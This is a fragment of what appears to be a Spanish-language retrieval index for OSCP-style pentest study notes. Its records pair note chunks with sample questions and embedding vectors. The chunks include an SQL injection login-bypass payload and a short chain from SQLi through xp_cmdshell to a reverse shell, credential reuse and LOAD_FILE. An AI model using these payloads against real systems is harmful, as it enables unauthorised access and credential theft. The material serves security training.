0.12396, -0.07958, -0.07608, 0.07033, -0.28402, -0.02495, -0.18214, -0.09574, -0.0744, -0.17682, -0.07335, 0.01525, -0.11639, -0.15077, 0.04666, 0.0256, -0.10329, -0.03361, 0.0257, 0.07483, -0.06848, -0.00764, -0.03581, -0.06415, 0.06044, 0.10909, 0.0037, -0.09236, -0.13949, -0.05205, 0.02892, 0.04627, -0.00459, 0.01276, -0.03384, 0.01988, 0.03421, -0.0068, -0.04264, -0.0069, 0.0035, -0.18063, 0.04863, 0.05805, 0.06608, 0.12369, -0.01333, -0.07815, -0.00955, -0.06438, 0.00976, -0.04217, -0.07801, 0.04567, -0.05444, 0.15225, -0.09467, -0.04712, 0.04724, 0.00831, 0.00255, 0.03834, 0.05126, 0.00917, -0.0388, 0.07709, -0.10857, -0.05283, 0.114, -0.07366, -0.00736, -0.01471, -0.01545, 0.02601, -0.0025, 0.01108, -0.02645, 0.08791, -0.07657, -0.17213, -0.0631, -0.00135, 0.07683, -0.01662, -0.06859, 0.10519, -0.03701, 0.02903, -0.11785, 0.01341, -0.0519, 0.03568, 0.03126, 0.05446, -0.07338, 0.11575, 0.05806, 0.02258, 0.06642, 0.06559, -0.07854, -0.02452, 0.19768, 0.05407, 0.05866, 0.09559, 0.00384, -0.08055, -0.01154, 0.02311, -0.03728, -0.13763, -0.03907, -0.03734, 0.06556, -0.00629, -0.02843, -0.03937, 0.01223, -0.09336, 0.00329, -0.04356, -0.02154, 0.0679, -0.06061, 0.00235, 0.12944, -0.10856, 0.02867, -0.02135, -0.0127, -0.05735, -0.05075, -0.04375, -0.00413, -0.03324, -0.04772, 0.00528, -0.04021, -0.02073, 0.02725, 0.01411, -0.02259, 0.05928, -0.0328, -0.01734, -0.04451, -0.01802, 0.02502, 0.12841, -0.01521, 0.03479, 0.05831, -0.00805, -0.04723, 0.08434, -0.03265, -0.09104, 0.05952, -0.01917, 0.03334, 0.0011, 0.00641, 0.04922, -0.05893, -0.02251, -0.03435, 0.06664, 0.03911, 0.01404, 0.07824, 0.01825, -0.06388, 0.0418, -0.01532, -0.01004, -0.04935, 0.07091, -0.048, -0.01226, 0.01321, 0.02482, -0.00476, 0.04213, -0.02114, 0.02341, 0.04323, 0.03418, 0.01854, -0.01214, 0.0692, 0.0102, -0.04448, 0.04683, 0.00757, -0.02262, -0.02766, -0.00175, -0.03366, -0.00167, 0.03015, -0.03663, -0.07157, 0.08021, 0.08204, -0.07365, 0.05276, 0.06182, 0.04932, -0.01241, -0.05069, 0.07819, 0.01252, -0.01263, -0.00197, -0.03308, 0.00882, 0.03101, 0.00434, -0.00532, 0.00036, 0.0974, 0.01042, -0.00816, -0.05977, 0.05943, 0.00859, 0.03841, 0.08919, -0.02014, 0.02035, 0.01988, -0.04773, 0.068, 0.00958, 0.01499, -0.03854, -0.0181, -0.05212, 0.08109, 0.08961, -0.0139, 0.01109, -0.0516, 0.00858, -0.08633, 0.05692, -0.01229, -0.01995, -0.01433, -0.00901, 0.01155, -0.0205, 0.03118, 0.00126]} -{"tipo": "pregunta", "herramienta": "SQL injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SQL injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# SQL injection\n\n> Aprende **manual primero** (en Burp Repeater e Intruder). `sqlmap` a veces miente β€” y en el examen estΓ‘ limitado (Reglas de herramientas). Vector de Hacking web.", "indexar": "Existe alguna herramienta libre que ayude con vectores de hacking web?", "v": [0.13546, 0.07546, -0.17486, -0.06501, 0.00456, -0.03095, -0.06501, -0.03813, 0.06335, -0.07644, -0.06195, -0.10938, -0.09725, -0.01436, 0.13025, 0.08416, 0.10978, -0.17057, 0.03488, 0.0274, 0.0207, 0.05382, -0.1161, -0.00186, -0.03833, -0.05777, -0.00841, 0.03394, -0.17011, -0.00948, 0.00396, -0.00713, -0.0296, 0.03539, -0.1613, -0.04405, 0.00933, 0.05245, 0.06814, 0.05056, 0.03262, 0.01676, -0.10492, -0.01833, 0.00404, 0.03656, -0.09198, -0.07773, 0.00134, 0.04719, -0.00906, -0.15642, -0.23208, -0.00194, 0.01422, -0.08139, 0.18038, -0.04846, 0.00303, -0.12055, -0.10959, 0.09251, 0.03154, -0.11572, -0.03064, -0.02899, 0.00714, -0.05192, -0.13151, 0.09045, 0.01146, 0.05925, 0.04689, -0.01533, 0.03239, 0.02945, -0.00243, 0.0645, 0.00782, 0.01567, -0.01543, -0.08135, -0.04387, 0.02492, -0.10112, -0.06997, 0.07716, -0.09775, 0.04487, -0.07862, 0.06122, 0.12935, -0.03399, -0.00991, -0.01213, -0.05142, 0.09446, -0.01351, 0.10821, -0.0036, 0.0505, -0.04012, -0.07404, 0.03885, 0.02469, 0.06253, 0.02209, -0.03304, -0.02646, -0.05081, 0.0607, -0.00051, -0.03056, -0.05492, -0.08025, -0.0509, -0.00415, -0.00488, 0.03998, -0.08454, -0.02081, 0.02459, -0.05755, 0.05833, 0.03579, 0.01891, -0.09104, 0.09124, -0.05906, -0.0824, 0.01011, -0.04315, -0.12223, 0.0251, -0.06784, 0.02942, -0.01004, -0.1459, 0.0113, -0.04588, -0.00743, 0.05435, -0.0288, -0.08184, 0.03564, 0.0098, 0.06873, -0.05209, -0.08177, -0.04123, 0.01735, 0.05364, 0.01996, 0.08345, -0.1101, 0.08013, -0.06509, -0.02018, -0.055, 0.03026, 0.00075, 0.03105, -0.00972, -0.04174, -0.03641, -0.00832, 0.00959, 0.01289, 0.04284, 0.08866, -0.00039, 0.08103, 0.044, -0.08374, 0.02308, -0.1063, -0.08445, -0.06099, 0.03733, -0.08006, -0.01602, 0.01868, -0.00103, -0.00775, -0.06983, -0.03225, 0.03885, 0.01397, 0.01101, 0.04767, 0.01164, 0.01046, -0.11142, -0.00387, 0.03679, -0.00484, -0.0566, -0.01228, 0.1044, -0.03159, -0.06907, -0.03918, 0.0051, -0.04299, -0.02667, 0.08774, -0.02886, -0.07844, -0.01251, 0.04691, 0.06236, -0.04203, 0.01919, -0.05115, -0.00711, -0.01158, 0.05504, 0.01785, -0.02922, -0.01163, 0.05485, 0.06349, 0.03673, 0.01675, 0.0042, 0.02296, 0.05923, 0.05111, 0.00913, 0.05278, -0.00128, -0.00592, -0.02232, -0.08995, 0.02497, -0.02384, 0.03467, -0.02762, -0.08012, 0.00396, 0.02081, 0.02508, -0.0225, -0.07519, -0.0296, -0.08905, -0.06358, -0.03812, -0.01665, -0.03961, -0.05455, 0.03739, 0.05812, -0.04655, 0.01388, 0.01019]} -{"tipo": "pregunta", "herramienta": "SQL injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SQL injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Bypass de login\n```\n' OR '1'='1'-- - (con espacio - doble guion - espacio)\n```", "indexar": "quΓ© herramienta sirve para probar inyecciones SQL en el login?", "v": [-0.18947, 0.01424, -0.14862, -0.1811, 0.0826, -0.34587, -0.1086, -0.15533, 0.03159, -0.05357, -0.16046, -0.07358, 0.10645, -0.12092, -0.09787, 0.04328, 0.04716, -0.17456, -0.09179, 0.01023, 0.06366, 0.01023, -0.07656, -0.08689, -0.08277, -0.01856, 0.08365, 0.02773, -0.0907, -0.04222, -0.1166, -0.03733, 0.0529, -0.01469, -0.07845, -0.03609, 0.03999, 0.02918, -0.00963, 0.00312, -0.00232, -0.05188, -0.11758, 0.04236, 0.00621, 0.03628, 0.04203, 0.06096, -0.04549, 0.07893, -0.08303, -0.11012, -0.08332, -0.05821, -0.00632, -0.07481, 0.06627, -0.06155, 0.06741, -0.01257, -0.15167, -0.04925, -0.00399, -0.02676, -0.0204, -0.0538, 0.01182, -0.07269, -0.0587, 0.08834, -0.13338, 0.00612, -0.04758, -0.05167, -0.01278, -0.04987, 0.08887, 0.06046, 0.05287, -0.04464, -0.02535, -0.02983, -0.1099, 0.02976, 0.00747, -0.05398, 0.09972, 0.0407, 0.05952, -0.04437, 0.04929, 0.0289, 0.06326, 0.02847, 0.02788, -0.0061, 0.09806, -0.09932, -0.00611, -0.02648, 0.08045, -0.08739, -0.0676, 0.15046, -0.04066, 0.02808, 0.02433, -0.01842, -0.09245, -0.04067, 0.0759, -0.03609, -0.10097, 0.01669, 0.02841, 0.08807, -0.02195, -0.01192, -0.08329, 0.02666, 0.00271, 0.0332, -0.05814, -0.0106, -0.026, -0.01783, 0.00278, 0.0217, -0.02633, -0.02708, -0.00521, -0.02029, -0.07176, 0.03777, -0.03652, -0.01463, 0.03999, -0.14442, -0.06268, -0.04071, -0.01341, 0.00069, -0.00306, -0.08285, 0.02161, 0.02186, 0.0544, 0.06026, -0.05271, 0.02344, 0.0435, -0.11047, 0.01649, 0.03424, -0.07001, -0.04823, 0.01598, -0.0188, -0.08625, 0.03372, -0.03296, -0.02058, 0.03993, 0.02937, 0.0084, -0.05326, 0.00894, -0.07927, 0.08372, 0.05544, 0.07679, 0.02682, 0.07534, -0.06162, 0.02668, -0.00259, -0.05852, -0.02783, 0.03869, -0.05969, 0.0099, -0.01746, -0.02368, -0.02743, 0.03959, -0.03564, 0.01431, 0.00744, 0.03249, 0.03493, -0.00542, 0.05134, 0.01386, -0.0859, 0.05853, 0.00826, 0.02179, -0.09871, 0.03897, -0.01643, -0.03694, -0.03211, -0.05812, -0.0674, 0.03801, 0.05229, -0.04061, 0.03813, 0.00055, -0.02629, 0.01801, 0.02219, 0.03948, 0.00913, 0.00113, -0.02078, 0.01974, 0.04524, -0.00601, 0.00728, 0.00021, 0.02028, 0.02862, -0.01481, -0.02977, 0.00825, 0.00334, -0.02166, 0.0212, 0.02382, 0.06688, 0.00018, -0.02401, 0.02139, 0.02452, -0.05046, 0.04318, -0.02195, -0.04277, -0.06064, 0.01549, 0.08376, -0.02061, 0.00602, -0.03508, -0.02314, -0.00807, -0.00302, -0.05216, -0.05543, -0.03635, -0.04223, 0.02041, 0.00277, 0.03162, -0.00904]} -{"tipo": "pregunta", "herramienta": "SQL injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SQL injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Bypass de login\n```\n' OR '1'='1'-- - (con espacio - doble guion - espacio)\n```", "indexar": "hay alguna tΓ©cnica para saltar el acceso con una peticiΓ³n especial?", "v": [-0.04354, 0.13101, -0.2179, -0.11984, -0.16972, -0.17749, 0.01859, -0.10437, 0.04883, 0.07459, -0.02303, -0.05046, 0.01815, -0.01256, 0.06852, -0.02687, 0.06541, 0.01356, 0.13417, 0.05773, 0.00357, 0.03041, -0.09659, -0.05976, -0.18717, -0.12695, 0.02623, -0.03309, -0.14984, -0.02877, -0.00626, 0.11591, -0.07492, -0.04029, 0.10033, -0.12076, 0.11694, 0.03791, -0.00648, -0.02604, -0.1065, -0.0443, -0.04773, -0.03989, 0.14845, -0.02798, 0.0672, 0.12306, 0.05249, -0.0099, 0.05005, 0.08018, -0.0478, -0.05921, -0.13812, -0.01772, 0.13113, -0.03392, -0.01649, -0.0206, -0.00367, -0.04006, -0.02781, -0.01111, 0.06401, -0.03511, 0.01967, -0.06612, -0.00789, 0.03532, -0.06757, -0.12631, 0.01298, 0.0655, 0.05498, -0.0572, -0.05951, -0.04844, 0.08249, -0.05259, -0.08441, 0.09168, 0.03066, -0.04232, -0.0275, -0.07042, 0.02973, -0.00316, 0.03184, -0.11546, 0.13922, 0.06974, 0.04205, -0.0823, 0.04843, -0.05833, 0.01125, -0.00016, -0.10712, 0.04132, 0.06146, -0.02223, 0.00108, 0.06902, -0.0326, 0.01715, -0.00026, -0.1189, -0.02245, 0.0063, -0.10456, 0.08215, -0.02588, -0.04674, -0.0848, -0.02639, -0.12505, -0.06676, -0.06616, 0.05076, -0.01845, -0.1374, 0.04386, -0.04169, -0.01837, -0.06807, -0.03815, 0.06451, -0.03168, 0.01439, -0.00793, -0.04034, -0.08078, -0.04845, -0.03074, 0.00454, 0.03585, -0.00637, -0.05091, 0.01523, -0.03347, 0.03299, -0.02926, -0.05416, 0.00359, 0.02385, 0.04891, -0.05974, -0.0682, -0.0634, 0.03053, -0.07293, 0.0221, 0.04523, -0.02861, -0.01884, 0.03348, -0.01185, -0.0568, 0.1046, -0.01399, 0.0863, -0.07272, -0.03432, -0.14334, 0.00306, -0.09268, -0.08509, -0.04046, 0.03703, -0.0428, -0.01489, -0.11262, 0.03688, 0.03183, -0.02172, -0.0608, -0.04283, 0.00733, -0.08431, -0.06965, -0.00518, 0.09028, -0.03082, 0.04671, -0.08142, -0.01731, -0.03297, 0.06788, 0.04994, 0.02089, 0.01277, -0.02871, -0.0, -0.05205, -0.02726, -0.05801, 0.04425, 0.02414, 0.03033, -0.04342, 0.0135, -0.06834, -0.08696, 0.04546, -0.01157, 0.00474, -0.02882, -0.01641, -0.01704, 0.00909, -0.05927, 0.00826, 0.01709, 0.01712, 0.01034, 0.00708, 0.02428, -0.01029, 0.00448, 0.03101, 0.03177, 0.04469, 0.07547, -0.02025, 0.01656, 0.06905, 0.00556, -0.0459, 0.08602, 0.00339, -0.0001, 0.02882, 0.00402, 0.02127, -0.01237, 0.00439, -0.05356, -0.02682, -0.03062, 0.03014, 0.08573, 0.01223, 0.00879, -0.03954, -0.005, -0.0888, 0.02902, 0.02921, -0.03227, 0.05653, 0.00521, 0.00285, -0.0394, 0.02554, -0.04612]} -{"tipo": "pregunta", "herramienta": "SQL injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SQL injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Bypass de login\n```\n' OR '1'='1'-- - (con espacio - doble guion - espacio)\n```", "indexar": "cΓ³mo puedo realizar un bypass de autenticaciΓ³n mediante inyecciΓ³n?", "v": [0.1347, 0.20962, -0.2037, 0.13787, 0.18846, 0.07598, 0.01206, -0.03075, -0.26226, -0.03823, -0.04216, 0.06333, 0.0297, 0.10957, 0.01162, 0.04635, 0.04559, 0.02346, -0.05053, -0.03153, 0.04273, -0.13708, -0.0167, -0.02503, 0.03897, 0.09933, -0.01917, 0.06796, -0.09825, -0.13056, -0.01989, 0.02725, 0.06707, 0.02929, -0.02314, -0.06771, -0.05582, 0.15447, 0.05399, 0.02918, 0.00218, -0.02396, -0.04881, 0.08749, 0.07979, -0.01867, 0.12333, 0.02603, -0.0286, -0.04165, -0.0091, 0.0266, -0.14542, -0.02577, -0.10871, -0.03811, 0.08345, -0.05387, -0.01305, -0.05766, 0.01881, 0.00719, 0.02172, 0.07574, 0.03101, -0.04473, 0.02714, -0.07521, 0.01717, 0.08437, 0.01089, -0.046, -0.00323, 0.03558, -0.03676, -0.03751, -0.06, 0.05555, 0.09207, -0.04937, 0.02119, 0.00568, -0.04464, -0.03295, 0.00855, 0.07165, 0.07017, -0.07044, 0.07813, -0.11664, 0.07097, -0.06154, 0.09976, 0.00676, -0.02545, 0.02536, -0.03018, -0.04656, -0.03762, -0.03953, 0.08076, -0.04361, -0.05476, 0.12661, 0.04501, 0.04178, -0.02067, -0.08607, 0.02822, -0.01189, -0.07293, 0.0159, -0.11707, -0.10895, 0.01926, 0.03036, -0.06945, 0.02254, -0.0381, -0.01903, -0.11623, -0.01119, -0.04016, -0.01355, 0.01774, 0.00361, -0.06567, 0.03303, -0.04233, 0.05399, -0.04808, 0.09523, -0.0249, -0.03406, -0.01839, -0.001, 0.04639, -0.10091, -0.06781, -0.01941, 0.08421, -0.01372, 0.04512, -0.0101, 0.04753, 0.05793, -0.07563, -0.11949, -0.03885, -0.02296, 0.00094, 0.02338, 0.01084, 0.1277, 0.00133, -0.03208, 0.02611, -0.10083, -0.00409, 0.11897, -0.09192, 0.09744, -0.07263, 0.00449, -0.03882, -0.04775, -0.0873, -0.04641, -0.01565, -0.03967, -0.00083, 0.05354, 0.0162, -0.0124, 0.07539, 0.06284, -0.04634, -0.06442, 0.08426, -0.06681, 0.03252, -0.0178, -0.04178, -0.03267, 0.0504, 0.009, -0.03215, 0.03211, 0.0309, 0.09454, 0.04983, -0.00589, -0.0086, 0.05211, 0.0168, 0.01278, -0.05669, 0.01652, 0.02737, 0.00485, 0.03349, 0.01324, 0.02095, -0.08452, 0.02021, -0.02223, -0.03742, -0.03556, -0.07441, 0.03452, 0.07862, -0.06008, 0.03599, -0.05676, 0.00752, -0.01245, 0.03449, -0.04114, -0.06393, 0.03004, 0.03303, -0.00044, 0.11883, 0.01087, 0.01233, 0.00045, 0.01553, -0.01726, -0.03584, 0.04527, -0.02608, 0.0258, -0.0264, 0.03899, 0.1018, 0.03908, -0.0017, 0.01447, -0.09162, -0.04004, 0.08022, 0.02288, -0.01601, 0.02018, -0.04999, 0.00467, -0.07778, -0.04928, -0.00682, -0.07734, 0.00137, 0.04908, 0.03375, 0.04584, 0.04163, -0.02775]} -{"tipo": "pregunta", "herramienta": "SQL injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SQL injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## De SQLi a shell\n- MSSQL: `xp_cmdshell` β†’ RCE β†’ Reverse shell.\n- Dump de tablas β†’ credenciales β†’ reutilizaciΓ³n en otros servicios (Pass-the-Hash, RDP).\n- Lectura de ficheros (`LOAD_FILE`) β†’ puede encadenar con LFI a RCE.", "indexar": "que programa sirve para convertir una vulnerabilidad SQLi en un shell remoto?", "v": [0.10753, -0.08862, -0.16268, -0.15789, -0.0067, -0.19077, -0.04508, -0.16652, 0.11392, -0.00947, -0.07995, -0.10225, 0.07657, -0.15037, -0.00756, 0.06713, -0.03267, -0.1438, -0.02678, 0.1115, 0.08731, -0.07426, 0.05815, -0.07514, -0.0649, 0.05938, 0.06045, 0.06819, 0.03207, -0.10499, -0.03369, -0.12934, 0.03087, -0.02797, 0.03099, 0.06029, -0.0321, 0.0586, -0.02318, 0.00619, 0.09321, -0.02535, -0.12652, 0.02573, 0.14686, -0.01435, 0.07717, -0.06127, 0.03304, 0.03771, -0.07758, 0.01408, -0.18715, -0.04231, 0.05731, -0.01808, 0.10906, -0.11474, 0.04101, 0.06975, -0.13083, -0.00638, 0.10465, -0.02554, 0.06081, -0.04042, -0.04685, -0.01452, -0.16169, 0.068, -0.07229, -0.05842, -0.007, -0.04508, -0.03863, -0.00828, 0.02228, -0.0301, 0.03029, -0.07974, -0.09596, -0.04048, 0.01533, 0.10182, -0.12682, -0.05576, 0.14613, 0.02058, 0.05003, -0.02391, 0.07812, 0.00396, -0.00407, 0.03029, 0.05932, -0.04468, 0.08323, -0.0268, -0.03625, 0.02996, -0.02123, -0.05297, -0.06138, 0.14427, 0.03505, 0.13239, 0.0645, -0.01268, -0.00609, 0.02027, 0.04303, -0.04455, -0.04924, -0.05573, -0.04911, 0.06561, -0.01676, -0.02186, 0.07707, 0.01121, -0.08758, -0.05698, -0.03546, 0.05824, -0.00928, -0.00014, -0.06093, 0.06581, -0.02887, 0.04989, -0.01347, 0.01235, -0.04299, 0.02848, -0.06553, 0.02368, 0.04361, -0.08199, -0.01324, -0.08407, 0.0118, 0.05221, 0.01213, 0.03855, 0.01324, -0.00026, 0.04946, 0.0127, -0.07518, 0.03161, 0.04525, 0.00846, -0.01025, 0.04441, -0.10022, -0.06368, 0.02078, -0.06486, -0.07776, 0.08512, 0.00958, 0.03297, 0.01856, -0.0286, 0.06606, -0.06185, 0.03729, -0.03169, 0.14856, 0.08003, -0.02551, 0.07066, 0.10142, -0.05217, -0.00613, -0.00973, -0.01725, -0.0418, 0.03815, -0.0993, -0.05047, 0.01894, 0.00303, -0.05172, 0.00776, 0.01594, 0.00116, 0.00481, 0.01339, -0.01854, -0.00621, 0.00837, -0.02693, -0.0079, 0.03803, -0.02932, -0.06178, -0.02994, 0.04152, -0.02875, -0.0738, -0.00737, -0.01746, -0.03278, 0.07736, 0.09046, -0.02871, 0.02858, 0.00071, 0.08017, 0.00696, -0.03628, 0.06867, 0.02544, 0.00441, -0.05051, -0.01001, 0.04254, 0.06799, 0.04628, -0.01594, -0.02074, 0.03746, 0.01857, 0.02367, -0.03817, 0.01121, -0.01295, 0.01883, 0.01228, 0.01762, -0.03025, 0.00948, -0.03548, 0.04552, -0.02981, -0.00229, -0.05869, -0.01106, -0.07234, -0.005, 0.07983, -0.03044, -0.05361, 0.00068, -0.02038, -0.08258, 0.04234, 0.00524, -0.06286, -0.10071, 0.03921, 0.04214, -0.04444, 0.00703, -0.01631]} -{"tipo": "pregunta", "herramienta": "SQL injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SQL injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## De SQLi a shell\n- MSSQL: `xp_cmdshell` β†’ RCE β†’ Reverse shell.\n- Dump de tablas β†’ credenciales β†’ reutilizaciΓ³n en otros servicios (Pass-the-Hash, RDP).\n- Lectura de ficheros (`LOAD_FILE`) β†’ puede encadenar con LFI a RCE.", "indexar": "con que puedo montar un shell inverso desde una base de datos MSSQL?", "v": [0.02036, -0.02773, -0.05244, -0.01715, -0.19231, -0.07419, -0.17998, -0.09094, -0.14536, 0.02191, -0.10052, -0.01513, 0.13015, -0.10285, 0.05327, 0.03967, 0.03025, -0.12553, -0.09668, -0.02086, 0.05407, -0.20058, 0.00667, -0.0952, -0.07896, 0.13898, -0.05225, 0.02888, -0.09705, -0.01342, -0.0614, -0.04875, -0.09845, 0.04229, 0.00131, -0.03934, -0.04492, 0.05207, -0.01127, -0.13383, -0.00345, 0.00878, -0.11932, 0.12027, 0.04978, -0.04262, 0.04067, -0.04243, 0.02167, -0.02985, -0.05756, -0.06744, -0.19675, -0.03626, -0.01067, -0.10995, 0.16357, -0.04493, 0.12906, 0.01102, -0.10912, 0.11605, -0.04269, 0.07209, 0.0286, -0.0068, 0.01593, -0.03126, -0.05267, 0.0551, -0.0605, 0.02173, -0.03376, -0.06138, -0.00589, -0.00256, 0.16331, 0.03845, 0.03743, 0.00366, -0.16553, -0.11576, -0.06785, 0.13823, 0.01421, 0.01024, 0.03855, -0.00722, -0.03539, 0.02182, 0.08593, 0.07597, -0.03617, 0.01524, 0.01277, -0.06398, -0.01132, -0.01099, -0.03126, 0.02526, -0.07683, 0.06713, 0.02195, 0.18897, 0.09866, 0.08026, 0.06254, 0.03989, -0.02811, 0.05093, -0.00656, -0.07067, -0.035, 0.0073, 0.01743, -0.06063, -0.0064, 0.04757, 0.00016, 0.07167, -0.00409, -0.01894, 0.07725, 0.06403, -0.03424, -0.10376, -0.04308, 0.08268, -0.00181, 0.07325, 0.00765, -0.00658, -0.08061, -0.00129, 0.01821, 0.1411, 0.00584, -0.03075, -0.00901, -0.05027, 0.02557, 0.03285, -0.01689, -0.0037, 0.00616, -0.01798, 0.09049, 0.00103, -0.11245, -0.01894, -0.00504, 0.11801, 0.08184, 0.02429, -0.06606, -0.01004, 0.03622, -0.04588, 0.00583, 0.05717, 0.00603, 0.06255, -0.01548, 0.04497, -0.00559, -0.06698, -0.02854, -0.05137, 0.05227, -0.01057, -0.04496, 0.05862, 0.05677, -0.04124, 0.06136, 0.01661, -0.07095, -0.03419, -0.00158, -0.02399, 0.02912, -0.02804, -0.00911, -0.06192, -0.00472, 0.04592, 0.04434, 0.00276, 0.00383, -0.05947, -0.02781, 0.07187, 0.0506, -0.00912, -0.02236, -0.00984, 0.02204, -0.02336, 0.09271, 0.0171, -0.03841, 0.03525, -0.02459, -0.00662, -0.00988, -0.00453, -0.07485, 0.05287, 0.02912, -0.04732, -0.01737, 0.02353, 0.00221, 0.04041, 0.0056, -0.00681, 0.06102, 0.019, -0.00048, 0.02417, -0.04838, 0.07026, 0.0739, -8e-05, -0.04074, -0.07126, 0.00638, -0.02809, 0.04115, 0.02749, -0.01636, 0.01663, 0.03449, -0.05301, 0.02416, 0.04042, -0.02964, -0.04244, 0.01341, -0.02469, 0.05536, 0.09514, -0.01275, -0.08346, 0.02563, -0.00828, -0.0814, 0.05544, -0.01848, -0.04033, -0.01044, -0.01735, 0.0367, -0.04046, -0.04872, -0.05075]} -{"tipo": "pregunta", "herramienta": "SQL injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SQL injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## De SQLi a shell\n- MSSQL: `xp_cmdshell` β†’ RCE β†’ Reverse shell.\n- Dump de tablas β†’ credenciales β†’ reutilizaciΓ³n en otros servicios (Pass-the-Hash, RDP).\n- Lectura de ficheros (`LOAD_FILE`) β†’ puede encadenar con LFI a RCE.", "indexar": "cual es la herramienta para usar credenciales robadas mediante lectura de ficheros para obtener acceso RCE?", "v": [-0.11943, -0.0538, -0.23273, -0.11296, 0.16, -0.06713, -0.0187, 0.02924, -0.08868, -0.11094, -0.16328, -0.10448, -0.04898, -0.13778, 0.19127, 0.01658, -0.03803, 0.03926, -0.09314, -0.07171, -0.02468, -0.0707, -0.17249, 0.0702, -0.02866, -0.00052, 0.10102, -0.09481, -0.00609, 0.02432, 0.11816, 0.02942, 0.05147, 0.02957, -0.11069, -0.04987, -0.03709, -0.02222, 0.00013, 0.08445, 0.07779, 0.10124, -0.15548, 0.07611, 0.01781, -0.06511, 0.01001, 0.13075, -0.04755, 0.11581, 0.01613, -0.09634, -0.13338, -0.07339, -0.02298, -0.06636, 0.16531, -0.00378, -0.05226, -0.05529, -0.12673, 0.08317, 0.05765, -0.10114, 0.00319, -0.12647, 0.0371, -0.06813, -0.07683, -0.01112, -0.05444, 0.03424, -0.03092, 0.02524, -0.00778, -0.05227, -0.08854, -0.01996, 0.10415, -0.03836, 0.04033, -0.03451, -0.09944, -0.01018, 0.01796, -0.02006, 0.19209, -0.04572, 0.00758, -0.01103, -0.01272, 0.06607, -0.04462, -0.05134, 0.0062, -0.0347, 0.0055, -0.09365, -0.00904, 0.0083, 0.05657, -0.04555, 0.00534, 0.10414, -0.05075, -0.08681, -0.07759, -0.00656, -0.00252, -0.0859, 0.03124, 0.05654, -0.07414, 0.00542, -0.01276, 0.0386, -0.00082, -0.07268, -0.01815, -0.15601, -0.0155, -0.03953, -0.08952, -0.03961, 0.09233, 0.04003, -0.00766, 0.04604, -0.10133, -0.05663, -0.02433, -0.02119, -0.10341, -0.02411, -0.02186, -0.06135, -0.00588, -0.11892, -0.06223, 0.00114, 0.05919, -0.0212, -0.07041, 0.00714, 0.01765, -0.03911, 0.01811, -0.0274, 0.00172, -0.04418, 0.00447, -0.01496, -0.06569, 0.01157, 0.01263, 0.03049, 0.00131, -0.02278, -0.07785, -0.0541, -0.07236, 0.00019, 0.06723, 0.00941, -0.02541, -0.11034, 0.05077, 0.01225, 0.09125, 0.04983, -0.02285, 0.01159, -0.01309, -0.00241, 0.05187, -0.03806, -0.08513, -0.00419, -0.02646, -0.05974, -0.03841, 0.00383, -0.02155, 0.01302, -0.02291, -0.02752, -0.00256, -0.04708, -0.04504, 0.01167, 0.00754, 0.05577, 0.05075, -0.03113, 0.02744, 0.0199, -0.0216, -0.04364, 0.08761, -0.0083, -0.02743, 0.02874, -0.04005, -0.05742, 0.07593, 0.02513, -0.01678, -0.04075, -0.04479, -0.00525, 0.05375, -0.0229, 0.08406, -0.05412, -0.01127, -0.03553, -0.04803, 0.04206, -0.01041, -0.02926, 0.01898, 0.01678, 0.05118, 0.01539, 0.00171, 0.02204, 0.01578, -0.01025, 0.00046, 0.02326, -0.01245, -0.02453, 0.00564, -0.00286, 0.00349, -0.03057, 0.00789, -0.01231, -0.00278, -0.0469, 0.00014, 0.06914, -0.00738, -0.03388, -0.0049, 0.02133, -0.06115, 0.01453, -0.01696, -0.06404, -0.02124, -0.02519, 0.01469, -0.04456, 0.0585, -0.03111]} -{"tipo": "pregunta", "herramienta": "Hacking web", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Hacking web.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Hacking web (metodologΓ­a)\n\n> CΓ³mo atacar una web paso a paso. En el OSCP, la web es el **foothold** mΓ‘s comΓΊn de las mΓ‘quinas standalone. Sub-Γ­ndice de EnumeraciΓ³n dentro de la MetodologΓ­a OSCP.", "indexar": "con que puedo atacar una web paso a paso como en un examen de hacking?", "v": [0.11035, 0.08962, -0.10395, -0.11149, -0.04526, -0.05204, 0.00814, 0.0287, -0.0191, 0.07555, -0.04759, -0.0214, -0.11411, 0.04194, 0.08269, 0.07385, 0.09335, 0.04793, 0.07397, 0.04716, -0.00888, 0.05744, -0.06326, 0.03978, 0.01116, -0.09581, -0.0632, 0.14053, -0.15396, -0.06078, -0.0521, 0.0332, -0.0277, 0.02202, -0.05325, 0.02178, 0.03196, 0.09143, 0.1593, 0.1832, -0.02431, 0.02004, -0.12826, -0.02547, -0.02053, 0.00457, 0.01043, -0.03831, 0.05355, -0.06713, 0.07638, -0.00067, -0.17834, -0.05151, -0.02237, -0.02124, 0.1099, -0.05385, 0.07651, -0.11172, -0.04809, 0.07138, 0.09674, -0.00134, 0.05039, -0.04457, -0.00761, 0.05007, -0.13282, 0.11778, 0.03394, 0.07196, -0.01012, -0.01515, -0.04499, -0.05318, 0.0075, 0.05475, 0.07873, 0.02868, -0.0047, -0.04684, -0.05702, 0.02809, -0.20118, -0.04555, -0.02417, -0.1268, 0.0568, -0.00627, 0.0368, 0.10399, 0.0009, -0.02104, -0.08133, -0.03719, 0.0933, -0.07696, -0.04181, -0.11116, -0.01629, -0.01157, -0.12554, 0.10988, -0.02336, 0.08458, 0.02632, -0.01797, 0.00606, -0.13858, -0.03552, 0.01211, -0.07754, -0.09641, -3e-05, -0.08215, -0.006, 0.01992, -0.03757, -0.05679, -0.07832, -0.01169, 0.0014, 0.05678, 0.04185, 0.02712, -0.01094, 0.00136, -0.06245, -0.09052, 0.0316, -0.00425, -0.05838, 0.09065, -0.04012, 0.00937, 